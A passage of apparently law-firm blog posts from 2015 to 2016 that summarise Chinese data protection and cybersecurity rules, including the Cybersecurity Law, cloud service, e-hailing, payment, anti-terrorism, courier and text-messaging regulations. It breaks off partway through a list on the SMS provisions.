Recently, the Ministry of Industry and Information Technology of the People’s Republic of China published a draft of the new Notice on Regulating Business Behaviors in the Cloud Service Market (Draft for Public Comments) (the “Draft”) for public comment. The Draft is open for comment until December 24, 2016.

Under the Draft, foreign investors investing in and operating cloud services within China must establish a foreign-invested telecommunications enterprise and obtain a value-added telecommunications business license. In addition, the Draft provides that when establishing technical cooperation with other entities, a cloud service operator must not lease out or transfer its telecommunication business license by any method to its partners, or provide resources, premises or facilities to its partners to facilitate illegal operations. The Draft also prohibits cloud service operators from using dedicated lines or VPNs to connect to an international network.

In addition, the Draft applies certain requirements to cloud service providers which were already applicable to Internet service providers, including that cloud service providers must establish and publish rules regarding their collection and use of personal information, and adopt security safeguards for network data and users’ personal information. In addition, upon a user’s termination of services, cloud service operators are required to cease their collection and use of the user’s personal information. Also, when establishing technical cooperation with other entities, a cloud service operator may not provide users’ personal information or network data to its partners in violation of law.

The Draft also provides that when providing services to residents of China, cloud service operators must host their service facilities and retain network data within the territory of China, and cross-border data transfers must proceed in compliance with relevant regulations. In the event of an information leakage, cloud service operators must promptly inform the users of the leakage, adopt effective remedial measures and report the incident to the administrative authority for the telecommunications sector.

The Draft is not yet in final form and there remains a possibility that the final version may differ substantially from the Draft. No time frame has been announced for the adoption of a final version.

Final Cybersecurity Law Enacted in China

On November 7, 2016, the Standing Committee of the National People’s Congress of China enacted the final Cybersecurity Law after it held its third reading of the draft Cybersecurity Law on October 31, 2016. The first draft of the Cybersecurity Law was published for comment more than a year ago, followed by the second draft in July this year. The final Cybersecurity Law will apply from June 1, 2017.

Under the Cybersecurity Law, the term “key information infrastructure” generally refers to information infrastructure maintained by certain industry sectors which would seriously jeopardize national security and the public interest should such infrastructures malfunction, or be subject to damage or data leakages. The relevant industry sectors include public communication and information services, energy, transportation, water resources utilization, finance, public service and e-government affairs. The State Council will formulate the specific scope of “key information infrastructure” and the mandatory security protection measures that organizations that operate “key information infrastructure” will need to apply.

Operators of key information infrastructure are subject to a data localization requirement, under which they must retain, within the territory of China, critical and personal information which they collect and produce during their operations in China. They may still be able to transmit this information overseas, but only after undergoing and passing a security review. In addition, when operators of key information infrastructure procure network products or services that may affect national security, a national security inspection is required. Operators of key information infrastructure are also required to undergo a network safety assessment at least once a year.

With respect to the collection and use of personal information, the Cybersecurity Law reiterates the requirements of notice and consent and the principles of legitimacy, rightfulness and necessity. Network operators are prohibited from providing a data subject’s personal information to third parties without the data subject’s consent, except in cases where the personal information is irreversibly depersonalized such that the data does not identify particular individuals.

In addition, a data subject can request a network operator to delete their personal information if he or she discovers that its collection or use is in violation of the law or of a contract between the parties. A data subject can also request a network operator to correct any personal information that is inaccurate.

According to the Cybersecurity Law, network operators must provide technical support and assistance to public or national security agencies when conducting an investigation of a crime. Network operators are required to adopt technical measures to monitor and record their network operations, and to preserve related web logs for at least six months. Overseas entities or individuals that attack, invade, interfere with or destroy “key information infrastructure” in China will be subject to legal liability, and public security agencies in China may adopt sanctions against them, including freezing their assets.

The Cybersecurity Law also includes provisions regarding the punishment of cyber crimes, including cyber fraud and the online protection of minors.

China’s Cybersecurity Law Undergoes Third Reading

On October 31, 2016, the Standing Committee of the National People’s Congress of China held a third reading of the draft Cybersecurity Law (the “third draft”). As we previously reported, the second draft of the Cybersecurity Law was published for comment in June. The National People’s Congress has not yet published the full text of the third draft of the Cybersecurity Law.

According to the National People’s Congress of China’s website, under the third draft of the Cybersecurity Law, the term “key information infrastructures” generally refers to information infrastructures maintained by certain industry sectors which would seriously jeopardize national security and the public interest should such infrastructures malfunction, or be subject to damage or data leakages. The relevant industry sectors include public communication and information services, energy, transportation, water resources utilization, finance, public service and e-government affairs. Operators of such infrastructures would be subject to a prospective data localization requirement, and would be required to implement certain security protection measures. The State Council will formulate the specific scope of “key information infrastructures” and the required security protection measures.

The third draft also stipulates that overseas entities or individuals that attack, invade, interfere with or destroy Chinese “key information infrastructures” will be subject to legal liability, and China’s public security agencies may adopt sanctions against them, including freezing their assets.

In addition, the third draft includes provisions regarding the punishment of cybercrimes, including cyber fraud, and the online protection of minors.

Regulation on the Online Protection of Minors Published for Comment in China

Recently, the Cyberspace Administration of China published for public comment a draft of the Regulations on the Online Protection of Minors (“Draft Regulations”). The Draft Regulations are open for comment until October 31, 2016.

The Draft Regulations stipulate that certain requirements apply to the online collection and use of personal information of minors. Under the Draft Regulations, any entity that collects or uses personal information of minors via the Internet must place a warning label at an easily visible position, stating the source, content and purpose of the collection of the information. That entity must then obtain the consent of the minors, or of their guardians. These entities are required to adopt specific rules for the collection and use to strengthen the online protection of personal information of minors.

If a minor, or his or her guardian, requests an Internet information service provider to delete or block the minor’s personal information, the Internet information service provider must abide by the request.

The Draft Regulations also stipulate that Internet information service providers who provide online gaming services must require online gamers to provide authentic identity information when registering. The cybersecurity authority will establish a blacklist of entities that have failed to protect the personal information of minors online.

Under the Draft Regulations, “personal information of minors” refers to all information that is recorded, whether electronically or otherwise, and can be used to identify a minor, whether individually or in combination with other information. The term includes name, location, address, date of birth, contact information, account name, identity card number, personal biological identification information and portrait, etc., of a minor.

An entity that violates the requirements in the Draft Regulations that apply to the collection and use of personal information of minors may face administrative penalties, including a warning and a requirement to effect a correction, a fine of up to RMB 500,000 and an order to suspend or stop the provision of relevant services.

China Enacts E-Hailing Regulation to Protect Driver and Passenger Data

Last month, the People’s Republic of China’s Ministry of Transportation, Ministry of Industry and Information Technology and six other administrative departments jointly published the Interim Measures for the Administration of Operation and Services of E-hailing Taxis (the “Measures”). E-hailing is an increasingly popular business in China and has already become a compelling alternative to the traditional taxi. The Measures seek to regulate this emerging industry, and will come into effect on November 1, 2016. Below is a summary of the key requirements.

The Measures contain a data localization requirement under which operators of e-hailing platforms will be required to locate their servers within mainland China. In addition, personal information collected on e-hailing platforms and business data generated during their operations must be stored and used within mainland China, and such information and data must be retained for at least two years.

The Measures also require operators of e-hailing platforms to expressly disclose the purpose, method and scope of the collection and use of the personal information of drivers and passengers while on the platforms. Operators of e-hailing platforms will be required to follow the principle of necessity when they collect personal information of drivers and passengers and may not use such personal information for other businesses without the consent of the data subjects.

Under the Measures, operators of e-hailing platforms must not, except for purposes of cooperating with supervisory authorities or with criminal investigations, provide the personal information of drivers and passengers (such as names, contact information, home addresses, bank or payment accounts, geographical location or travel routes) to any third parties. They are also prohibited from disclosing sensitive information relating to national security, such as geographical coordinates and symbols.

The Measures also require operators of e-hailing platforms to adopt systems for the administration of cybersecurity and technical security measures. In the event of an information leakage, operators of e-hailing platforms must report to the relevant competent authority without delay and take timely and effective remedial measures.

E-hailing platform operators that illegally use or disclose passengers’ personal information may face a penalty of RMB 2,000 to RMB 10,000. They may also be subject to civil liability for compensation and criminal sanctions.

China Publishes Regulation on the Use of Resident Identity Cards

Recently, the People’s Republic of China’s Ministry of Public Security, the National Development and Reform Commission and six other administrative departments jointly published the Announcement on Regulating the Administration of the Use of Resident Identity Cards (the “Announcement”). The Announcement came into effect on July 15, 2016, the date of its issuance.

The Announcement reiterates existing prohibitions against leasing, lending or assigning a resident identity card to another person, and reiterates an existing requirement that resident identity cards must not be seized or held as security by government agencies, related entities or their staff.

According to the Announcement, when performing their duties or providing services, personnel of government agencies and related entities must not arbitrarily record the personal information of citizens that appears on their resident identity cards. Additionally, government agencies, related entities or their personnel cannot arbitrarily copy or scan identity cards of residents. The Announcement encourages citizens to resist unauthorized copying, scanning or seizure of their resident identity cards.

Government agencies and related entities are required to establish administrative systems for the security of personal information and develop those systems to their fullest extent, adopt internal storage systems for personal information that use strict access authorization procedures and strengthen their security measures to avoid the leakage or theft of information.

Government agencies and related entities are also required to establish a “blacklist” of individuals having a history of using the resident identity cards of other persons as their own, and to adopt information sharing mechanisms.

China’s State Administration for Industry and Commerce Publishes Draft Regulations on the Protection of Consumer Rights

The State Administration for Industry and Commerce of the People’s Republic of China published a draft of its Implementing Regulations for the P.R.C. Law on the Protection of the Rights and Interests of Consumers (the “Draft”) for public comment. The draft is open for comment until September 5, 2016.

The Draft reiterates the requirements under the law that business operators must follow the principles of legitimacy, rightfulness and necessity when they collect and use the personal information of consumers. They also must expressly state the purposes, methods and scope of their collection and use of the information, and obtain the consent of the consumers. It also provides that business operators may not collect information that is irrelevant to their operations, or collect information in an improper way. Under the Draft, a business operator is required to retain, for at least five years, supporting documentation that can demonstrate its performance of its obligation to expressly inform and obtain the consent of consumers.

Business operators are required to adopt information security systems to ensure the security of the personal information of consumers. Business operators are required not to provide consumers’ personal information to other parties without the consumers’ consent, except in cases where the consumers’ personal information is anonymized in such a way that it cannot identify the specific individual and that the anonymization cannot be reversed.

In the event that a business operator suffers an information security breach which results in the disclosure or loss of information, or anticipates that such a breach is likely, the business operator is required to adopt remedial measures and promptly inform the affected consumers of such breach.

Compared with the original definition of “consumers’ personal information” in the earlier Measures for the Punishment of Conduct Infringing the Rights and Interests of Consumers, the scope of the term “consumers’ personal information” under the Draft additionally includes biometric features.

According to the Draft, without consumers’ express consent or request, business operators may not send them commercial electronic messages or make commercial marketing calls. Business operators also may not cause consumers to bear the costs of sending commercial electronic messages or making commercial marketing calls, unless otherwise agreed by the parties.

Second Draft of the Cybersecurity Law Published for Comment in China

On July 5, 2016, the Standing Committee of the National People’s Congress of the People’s Republic of China (the “Standing Committee”) published the full second draft of the Cybersecurity Law (the “second draft”). The publication of the second draft comes after the Standing Committee’s second reading of the draft on June 27, 2016. The public may comment on the second draft of the Cybersecurity Law until August 4, 2016.

The second draft reiterates that network operators should conform to the principles of legality, justice and necessity when collecting personal information, and should expressly inform the data subject of the purpose, method and scope for their collection and use of the information. The second draft also stipulates that network operators are prohibited from providing a user’s personal information to third parties without the user’s consent, except where the personal information is depersonalized in such a way that it cannot identify the individual and the depersonalization cannot be reversed.

The definition of “key information infrastructure” remains unclear in the second draft. According to the second draft, “key information infrastructure” refers to information infrastructure of which damage, malfunction or data leakage would seriously jeopardize national security and the public interest. The State Council will formulate the specific scope of key information infrastructure and the security protection measures for key information infrastructure. Read more information about the second draft.

China Publishes First Regulation Expressly Regulating Mobile Apps

On June 28, 2016, the State Internet Information Office of the People’s Republic of China published the Administrative Provisions on Information Services for Mobile Internet Applications (the “App Administrative Provisions”). This is the first regulation that expressly regulates mobile apps in the People’s Republic of China. Before the App Administrative Provisions were published, the P.R.C. Ministry of Industry and Information Technology had published a draft of the Interim Provisions on the Preinstallation and Management of the Distribution of Mobile Intelligent Terminal Applications (“Interim Provisions”). The comment period for the Interim Provisions draft expired six months ago and it is still uncertain when it will become effective. According to unofficial statistics, domestic app stores presently have more than 4 million apps in inventory, and the number is growing. Those apps will now become highly regulated products under the App Administrative Provisions.

Most importantly, the App Administrative Provisions expressly requires app providers who provide information services via apps to obtain relevant licenses. Currently, numerous app providers conduct information service businesses without having any license to do so, due to the lack of express laws in this area. With the issuance of the App Administrative Provisions, these app providers will now have to apply for and obtain the relevant licenses, which can include ICP, Internet Culture Operation and/or Internet Publishing Licenses.

Also, according to the App Administrative Provisions, app providers now have obligations relating to information security. For example, app providers are now required to conduct an authentication of the identity of their registered users according to a principle summarized as “real name authentication at the back end, voluntary authentication at the front end.” Also, without the users’ consent, an app provider is required not to collect or use personal information or operate functions which are closely related to the personal information of its users, such as location, contacts and camera. App providers also are required not to produce or publish apps that infringe upon the intellectual property of third parties, and are required to maintain the log-in information of the users of their apps on file for 60 days.

Internet Application Store Service Providers (“IASS Providers”) are required to supervise the performance by app providers of their obligations. For example, an IASS Provider is required to file required information about app providers with branches of the governmental Internet Information Offices at the provincial level, and to supervise the app providers’ performance of their obligations. If any app provider violates its obligations, the IASS Provider is required to adopt relevant remedial measures, and file a report with the relevant government agencies.

Second Reading of China’s Draft of Cybersecurity Law

On June 27, 2016, the Standing Committee of the National People’s Congress of the People’s Republic of China held a second reading of the draft Cybersecurity Law (the “second draft”). The law is aimed at strengthening the protection and security of key information infrastructure and important data in China. As we previously reported, the first draft of the Cybersecurity Law was published for comment almost a year ago, but the National People’s Congress has not published the full second draft of the Cybersecurity Law to date.

According to the website of the National People’s Congress, the second draft of the Cybersecurity Law stipulates that the State will adopt priority protection over key information infrastructure whose damage or data leakage would seriously jeopardize national security and the public interest.

The second draft also reiterates the requirement that key information infrastructure operators should store, within the territory of China, personal information and other important business data collected and produced during operations. If it is necessary to transfer such information and data to overseas individuals or organizations for business requirements, a security assessment should be conducted.

The second draft has a new provision requiring that information collected by competent government authorities during their protection of key information infrastructure be used only for the protection of network security. The second draft additionally states that big data applications must anonymize personal information, and that the State will support research on protecting data and promoting security.

Network operators will be required to comply with social morals and business ethics, and will be subject to governmental and public supervision. In addition, network operators will be required to preserve web logs for at least six months, and cooperate with the supervision and inspection of competent government authorities.

China Publishes Provision to Regulate Internet Search Services

On June 25, 2016, the Cyberspace Administration of China published its new Administrative Provisions on Internet Information Search Services (the “Provisions”). The Provisions will come into effect on August 1, 2016.

Under the Provisions, Internet information search service providers (“service providers”), which include operators of search engines, are required to adopt information security management systems, such as systems enabling the review of information, real-time inspection of public information and protection of personal information.

Under the Provisions, service providers are prohibited from showing subversive and obscene content and other content prohibited by law and regulation. If legally prohibited content shows up in a search result, service providers should block the result and report it to the Cyberspace Administration.

In addition, service providers should provide search results that are objective, impartial and authoritative. When providing paid search results, service providers must review the qualifications of the paying clients and clearly distinguish paid results from natural search results, attaching clearly evident marks to paid search results on an item-by-item basis.

The release of the Provisions was triggered by the death of a young man, who chose a hospital based on an Internet search on Baidu (a popular search engine in China), but received ineffective hospital treatments and therapy that was not yet fully approved.

Draft E-Commerce Standards Published for Comment in China

On March 22, 2016, the Ministry of Commerce of the People’s Republic of China published drafts of its proposed (1) Specifications for Business Services in Mobile E-commerce (“Mobile E-commerce Specifications”) and (2) Specifications for Business Services in Cross-border E-commerce (“Cross-border E-commerce Specifications”). A public comment period on these drafts is now open. Comments will be accepted until May 31, 2016.

The Mobile E-commerce Specifications contain several provisions that require service providers in the e-commerce sector to take measures to ensure the security of operational data and service platforms. According to the Mobile E-commerce Specifications, “service providers in the electronic commerce sector” refers to platform service providers who provide e-commerce transaction platforms that are accessed over mobile devices. The Mobile E-commerce Specifications apply whenever these platforms are accessed or used by online sellers, logistics services providers, payment service providers and purchasers via mobile devices.

Under the draft specifications, platform service providers would be responsible for the handling of transaction information and relevant personal information from online sellers. The authorization of the data subject would be required before collecting and processing personal information. The collection of transaction information would have to be authorized by the parties to the transaction.

In addition, personal and transaction information may not be directly used for commercial purposes unless it has been desensitized. Platform service providers could, with the consent of an online seller, transfer, copy, transmit or process desensitized data from the online seller. Personal information would have to be encrypted before being transferred online. Also, a record must be maintained of any disclosures of personal and transaction data to administrative authorities, enforcement authorities or the judiciary.

Platform service providers also would be responsible for the management of the platform’s data security. Personal data from online sellers should be isolated on the platform, and only the data owner should have access to the data. Modifications to original data stored on the platform should be authorized only by the data subject. Platform service providers would be responsible for protecting personal data from online sellers from loss.

The Cross-border E-commerce Specifications would impose similar requirements and obligations in a separate, but closely related, category and would apply the same obligations under the Mobile E-commerce Specifications to e-commerce service providers who provide e-commerce transaction platforms for the purchase and sale of cross-border goods. The Cross-border E-commerce Specifications apply whenever these platforms are accessed or used by online sellers, logistics providers, payment service providers and purchasers of cross-border goods.

CIPL, Hunton & Williams, TRUSTe to Represent U.S. Business on APEC E-Commerce Business Alliance Expert Council

During last week’s APEC privacy and e-commerce meetings in Lima, Peru, the APEC E-Commerce Business Alliance (“ECBA”) established its 2nd APEC E-Commerce Business Alliance Expert Council (“Expert Council”). The ECBA Expert Council is comprised of 32 e-commerce experts from government, academia and the private sector in the APEC region. The U.S. members are Markus Heyder, Vice President and Senior Policy Counselor at the Centre for Information Policy Leadership, Manuel “Bing” Maisog, partner at Hunton & Williams, and Joshua Harris, Director of Policy at TRUSTe.

The APEC-ECBA was created in 2001 to (1) promote cooperation between the public and private sectors in the field of e-commerce, (2) provide a forum for information sharing between APEC member economies, and (3) develop e-commerce across different industry sectors. ECBA’s secretariat is based in the China International E-Commerce Center, a quasi-public agency under China’s Ministry of Commerce. The first ECBA Expert Council was formed in 2010 to strengthen and support ECBA’s mission through research, reports, training and other initiatives. ECBA holds annual conferences for the Expert Council and other APEC-based government and private sector stakeholders.

In late June or early July 2016, ECBA will hold its 6th APEC E-Commerce Business Alliance Forum called “Realize Inclusive Trade Through Cross-Border Electronic Commerce.” This three-day event will be held in China, either in Jinjiang, Fujian Province or Mianyang, Sichuan Province.

China Enacts Administrative Measures for Online Payment Businesses

On December 28, 2015, the People’s Bank of China published Administrative Measures for Online Payment Business of Non-bank Payment Institutions (the “Measures”). The Measures were enacted to provide further details on the regulation of online payment businesses, in supplement to the earlier Administrative Measures for the Payment Services of Non-financial Institutions (the “2010 Measures”), published by the People’s Bank of China on June 14, 2010. The 2010 Measures regulated the conduct of all payment services, including both online payment methods and three other types of payment methods, by all types of Non-bank Payment Institutions (“NBPIs”). The newer Measures are more focused and apply only to online payment methods, and only to NBPIs which have already obtained a Payment Business License and are engaged in an online payment business.

The impact of the Measures will reach beyond the payment market itself to promote the development of the e-commerce and Internet finance sectors in China. The Measures will come into effect on July 1, 2016. Consistent with the 2010 Measures, the new Measures require NBPIs to take effective protective measures for the security of their clients’ personal information, and to adopt risk control systems. The Measures further restrict the storage of clients’ sensitive information, such as track information or chip information of their clients’ bank cards, their verification codes or passwords. In principle, NBPIs are not allowed to store the effective term of the bank cards, unless they are stored for special business needs or pursuant to authorization by the clients and the banks opening the bank cards. Further, this information must be encrypted prior to storage.

Under the Measures, NBPIs are required to collect, use, store and transfer clients’ information only to the minimum extent necessary, and to notify clients of the purpose and scope of their use of the information. The Measures restrict NBPIs from providing clients’ information to other institutions or individuals, unless otherwise required by laws and regulations, or unless the provision of each item was confirmed and authorized by the clients.

The Measures also impose responsibilities on the NBPIs to bind the merchants which are counterparties to their online payment services. NBPIs are required to sign agreements with the merchants, prohibiting the merchants from storing sensitive information of their clients, and to adopt supervisory measures, such as periodic checks and technical monitoring, as may be necessary. If the merchants store sensitive information in violation of the agreement, the NBPIs are required to promptly suspend or terminate their provision of online payment services for these merchants, and adopt effective measures to delete the sensitive information and to prevent disclosure of it. The NBPIs also may be liable for losses and liabilities caused by the disclosure of relevant information.

The Measures further require NBPIs to maintain online payment business processing systems that are safe and comply with normative specifications, and related backup systems, within the territory of China. When providing services for domestic transactions, NBPIs are required to complete the transactions using their domestic business processing systems, and to complete the financial settlement within the territory of China.

Anti-Terrorism Law Enacted in China

On December 27, 2015, the Standing Committee of the National People’s Congress of the People’s Republic of China published the P.R.C. Anti-Terrorism Law. The law was enacted in response to a perceived growing threat from extremists and terrorists, particularly in regions in Western China, and came into effect on January 1, 2016.

As its name suggests, the main goal of the law is to strengthen national security and to prevent terrorism. The law defines terrorism and declares it to be illegal, authorizing both civil and criminal sanctions. The law also takes certain actions that promote its objectives, such as (1) allowing for the designation of certain organizations as terrorist organizations, (2) establishing institutions such as a counter-terrorism intelligence agency and counter-terrorism units of the armed police forces and of the People’s Liberation Army to allow for the requisition of property in urgent circumstances, (3) mandating a system for incident response planning and (4) providing for international cooperation. It also empowers public security agencies to take actions such as launching investigations and even using weaponry in emergency or dangerous circumstances.

Certain provisions in the law require telecommunications system operators and Internet service providers to provide technical support and assistance, such as access to their technical interfaces and assistance with decryption, to public security and state security authorities which may be conducting investigations of terrorist activities or taking action to prevent them. The law also requires telecommunications system operators and Internet service providers to adopt network security systems and information content monitoring systems to prevent the dissemination of information containing terrorist or extremist content over their systems. If they discover information with terrorist or extremist content being disseminated over their systems, they must halt the dissemination, close the relevant websites, keep records of the incident and make a report to the relevant public security organizations. A fine of more than RMB ¥500,000 may be imposed on telecommunications system operators and Internet service providers who fail to provide technical interfaces, decryption and other technical support or assistance to competent government agencies, and the person in charge may be subject to a fine of up to RMB ¥500,000 and possibly detention of up to 15 days.

The Anti-Terrorism Law permits the People’s Liberation Army to get involved in anti-terrorism operations overseas. It also restricts the right of media of various types to report the details of terrorist attacks. For instance, social media cannot report on details of terror activities that might inspire copycat attacks, and cruel and inhuman scenes cannot be depicted in their reports.

The Anti-Terrorism Law contains several provisions that are significant in the context of personal information protection. For instance, the law requires railway, road, water and air transport operators and postal offices, couriers or other logistics operators to conduct an examination of the identities of their clients, and to perform security checks and visual checks on the articles they transport and deliver. An operator listed above which fails to comply with the foregoing obligations may face a fine of up to RMB ¥500,000 (approximately $76,250 USD at current exchange rates), and the person in charge may face a fine of up to RMB ¥100,000.

Service providers in certain industry sectors, such as the telecommunications, Internet, finance, hotel, long-distance passenger transportation and automobile leasing sectors, are required to conduct an examination of the identities of their clients as well. Service providers which fail to examine their clients’ identities, or provide services to those who refuse to make this examination, may be subject to fines of more than RMB ¥500,000. The person in charge may face a fine of up to RMB ¥500,000.

The law permits the collection of financial personal information, including information that would be considered sensitive personal information in other jurisdictions, for purposes of investigating suspected terrorist activities. For instance, during such investigations public security organizations have the authority to investigate the financial information of suspects, such as information relating to their bank deposits and stock and bond holdings. Also during an investigation, public security organizations are given the authority to collect information about suspects including their portrait, fingerprints, iris images and biological samples such as blood samples. In addition, government authorities and other entities or individuals that may be involved are required to keep in confidence any state secret, trade secret or private personal information which may be obtained during the performance of their anti-terrorism investigations.

The Anti-Terrorism Law defines circumstances in which state security organizations have authority to collect personal information. In such circumstances, when there is a conflict with other data privacy regulations that may otherwise prohibit collection, the Anti-Terrorism Law presumably would control. The Anti-Terrorism Law represents a further step in the sector-by-sector development of China’s data privacy framework.

China Publishes New Regulation for Personal Data Security in the Courier Industry

On November 16, 2015, the Legislative Affairs Office of the State Council of the People’s Republic of China published a draft Regulation for Couriers (the “Regulation”) and requested public comment on the Regulation. Interested parties have until mid-December 2015 to submit comments on the Regulation. The Regulation comes at a time when courier services and online shopping are growing steadily in China. Under the Regulation, the sender of a parcel will be required to fill in his or her real name and address, the telephone numbers of both the sender and the recipient, as well as the name, quantity and nature of the object being couriered.

The courier company would then be required to verify that information. The courier company also would be required to refuse orders with false information on the waybill. If a courier company fails to check the waybill or accepts parcels with false information on the waybill, it may be subject to a maximum fine of RMB 10,000 (approximately $1,586).

The Regulation also would require courier companies to regularly destroy waybills to protect client personal information. In addition, courier companies will be prohibited from illegally selling or leaking client personal information they collect in the course of providing services. In cases of actual or potential leakage, destruction or loss of client personal information, courier companies would be required to take immediate remedial measures and report the incident to the local postal administration authority.

A courier company that breaches the foregoing obligations may face administrative penalties including the issuance of a warning, confiscation of illegal income, a maximum fine of RMB 50,000 (approximately $7,840) and possibly even revocation of its operating license.

In addition, if a courier company opens parcels without permission, hides, destroys, sells or illegally inspects parcels, it will be subject to a maximum fine of RMB 200,000 (approximately $31,360). In exceptional circumstances, its operating license also may be revoked.

Hunton Publishes Several Chapters in International Comparative Legal Guide to Data Protection

Hunton & Williams is pleased to announce its participation with the Global Legal Group in the publication of the second edition of the book The International Comparative Legal Guide to: Data Protection 2015. Members of the Hunton & Williams Global Privacy and Cybersecurity team prepared several chapters in the guide, including the opening chapter on “Legislative Change: Assessing the European Commission’s Proposal for a Data Protection Regulation,” and chapters on Belgium, China, France, Germany, the United Kingdom and the United States.

The guide provides privacy officers and in-house counsel with a comprehensive overview and analysis of data protection laws and regulations around the world. It begins with the first chapter on the proposed European legislative reform and then covers existing laws and regulations in 32 jurisdictions.

Bridget Treacy, partner and head of the UK Privacy and Cybersecurity practice, served as the contributing editor of the guide and co-authored the United Kingdom chapter. Additional Hunton & Williams authors included: Anita Bapat (United Kingdom), David Dumont (Belgium), Claire François (France), Dr. Jörg Hladjk (Germany), Chris D. Hydak (United States), Manuel E. Maisog (China), Wim Nauwelaerts (Belgium) and Aaron P. Simpson (United States).

Hunton & Williams’ Global Privacy and Cybersecurity practice group assists organizations in managing privacy and data security risks associated with the collection, use and disclosure of consumer and employee personal information. Hunton & Williams has been ranked as the top law firm globally for privacy and data security by Computerworld magazine in all of its surveys, and has been rated by Chambers and Partners as the top privacy and data security practice in its Chambers Global, Chambers Europe, Chambers UK and Chambers USA guides.

The privacy practice also maintains The Centre for Information Policy Leadership, a privacy think tank and consulting practice that leads public policy initiatives that promote responsible information governance necessary for the continued growth of the information economy.

Read the full news release.

Draft Cybersecurity Law Published for Comment in China

On July 6, 2015, the Standing Committee of the National People’s Congress of the People’s Republic of China published a draft of the country’s proposed Network Security Law (the “Draft Cybersecurity Law”). A public comment period on the Draft Cybersecurity Law is now open until August 5, 2015.

At this point, the Draft Cybersecurity Law has not yet been finalized. The draft contains, however, a number of provisions that are significant, insofar as they reveal underlying assumptions and priorities that govern the development and promotion of cybersecurity in China. If even a handful of these provisions make their way into the final version, the law could prove itself to be consequential.

One such provision is actually spread across a number of clauses that firmly and clearly establish the government’s leading role in the furtherance of cybersecurity. In the Draft Cybersecurity Law, certain relevant private firms are referred to as “network operators” and “operators of key information infrastructure.” Regardless of their technological resources and practical experience, these operators are required by the Draft Cybersecurity Law to support and cooperate with the government’s leading role in the furtherance of cybersecurity, rather than exercising a leading role of their own.

Another striking provision is one that would allow government bodies at certain levels to adopt measures to restrict the transmission of information over the Internet in places where public safety “incidents” (referred to somewhat euphemistically as “社会安全事件”) have erupted. This may be done to preserve the national security and public social order. It may become difficult to contact someone via the Internet who is in a place where such an “incident” has recently occurred. Already in practice in affected areas where there has been a “public safety incident,” short messaging services are usually restricted, and ingoing and outgoing telephone calls are strictly supervised.

The Draft Cybersecurity Law also includes a provision that pushes China towards a policy of data localization. Pursuant to this provision, important data (such as the personal information of citizens) must be stored within the territory of the People’s Republic of China. Notably, the restriction appears to be limited and would apply only to operators of key information infrastructure, largely enterprises in heavily licensed and regulated industries such as providers of basic and value-added telecommunications services, energy, utilities and health care services. The provision also appears to allow for cross-border transfers even by operators of key information infrastructure when there is an operational requirement for the transfer, as long as a security assessment has been conducted. The precise requirements of the security assessment, however, are not spelled out in the Draft Cybersecurity Law.

There are many other significant provisions in this potentially impactful draft law, including some that reiterate rules for the handling of personal data by requiring network operators to observe strict confidentiality and to not disclose, falsify, destroy, sell or illegally provide personal information of citizens which they have collected. Another provision requires network operators who collect personal information to do so only in a lawful and proper manner, to collect only what is necessary, to clearly state the purposes, method and scope of the collection and to obtain the consent of the data subject. Many of these provisions overlap with some of the requirements on the handling of “electronic personal information” imposed by the December 2012 Resolutions.

We will report further on the content of the law, particularly after the final version has been published.

Hong Kong Privacy Commissioner Hosts 43rd APPA Forum and Big Data Conference

On June 11 and 12, 2015, Asia Pacific Privacy Authority (“APPA”) members, invited observers and guest speakers from the government, private sector, academia and civil society, met in Hong Kong to discuss privacy law and policy issues at the 43rd APPA Forum. At the end of the open session on day two, APPA issued its customary communiqué, setting forth the highlights of the discussions of the open and closed sessions. The Hong Kong Privacy Commissioner, who hosted the APPA meeting, also hosted a conference on big data and privacy on June 10.

According to the Communiqué, during the closed session, APPA members and invited observers discussed numerous issues of common interest, including legal reforms across the region, law enforcement and investigation matters, breach notification and transparency in reporting requests from law enforcement and national security authorities to companies for personal information. During the closed session, privacy developments in other international fora and groups, such as APEC, the International Conference of Data Protection and Privacy Commissioners, GPEN and the Ibero-American Network of Data Protection were also discussed. Finally, attendees of the closed session discussed privacy issues associated with big data and behavioral advertising, the regulation of public domain data and organizational accountability.

During the open session, APPA members and observers were joined by local and international privacy experts, including representatives from the Centre for Information Policy Leadership at Hunton & Williams LLP (“CIPL”), to discuss issues relating to data management and use in the modern information age. Other topics of discussion included updates on privacy laws in China and Taiwan, managing research data, open data and access to open data, health data and privacy, and smart cities and IT.

The previous day, the Hong Kong Privacy Commissioner hosted the International Conference on Big Data from a Privacy Perspective. The public event was attended by many privacy commissioners, as well as privacy professionals and industry representatives from across the Asia-Pacific region. The conference considered the benefits and risks of Big Data in a data driven world and how the industry should innovate and find new ways to provide transparency to individuals. The CIPL delegation participated in a panel discussion entitled Big Data and Emerging Best Practices for a Win-Win Situation: Protecting Privacy and Enabling Benefits in a Data Driven Economy, and offered solutions and best practices.

APPA is the principal forum for privacy authorities in the Asia-Pacific Region. APPA members meet twice a year to discuss recent developments, issues of common interest and cooperation.

China’s Ministry of Industry and Information Technology Published Rules Governing Use of Text Messaging

On May 19, 2015, China’s Ministry of Industry and Information Technology promulgated its Provisions on the Administration of Short Messaging Services (the “Provisions”), which will take effect on June 30, 2015.

Prepared to combat improper texting practices, such as junk short messages, the Provisions were adopted under the July 2014 People’s Republic of China (“P.R.C.”) Telecommunications Rules (“2014 Revision”) and the December 2012 Resolution of the Standing Committee of the National People’s Congress Relating to Strengthening the Protection of Information on the Internet for purposes of (1) normalizing conduct related to short messaging services (“SMS”), (2) protecting the lawful interests of users, and (3) promoting the sound development of a market for SMS.

The Provisions are important in several ways. First, they establish certain basic operating requirements which SMS providers must observe in their text messaging campaigns. Under these requirements:

  • SMS providers must hold a telecommunications enterprise license;
  • when SMS providers charge user fees, the charges must be made in accordance with applicable laws, regulations and standards;
  • SMS providers must maintain records of the times of transmission, user receipts and when a user unsubscribes; and
  • SMS providers must not use SMS systems to circulate or broadcast illicit content.

Second, the Provisions establish more detailed rules (for example, compared to the earlier amendment to the P.R.C. Law on the Protection of the Interests of Consumers or its implementing measures published on January 5, 2015) on the manner in which text messages may be sent to consumers. Under the Provisions’ rules:

  • SMS providers and short messaging content providers must not send commercially-purposed text messages to end users without their consent or request;
  • when end users provide their consent, the type, frequency and duration of the planned broadcast campaign must be made clear;
  • commercially-purposed text messages must not be sent to certain (non-commercially oriented) ports;
  • commercially-purposed text messages must include an expedient and effective method for unsubscribing; and
  • SMS providers must establish a system for supervising text messages, and an early warning and monitoring mechanism.

In addition to the foregoing rulemaking, the Provisions establish practical channels by which consumer interests could be protected. These include:

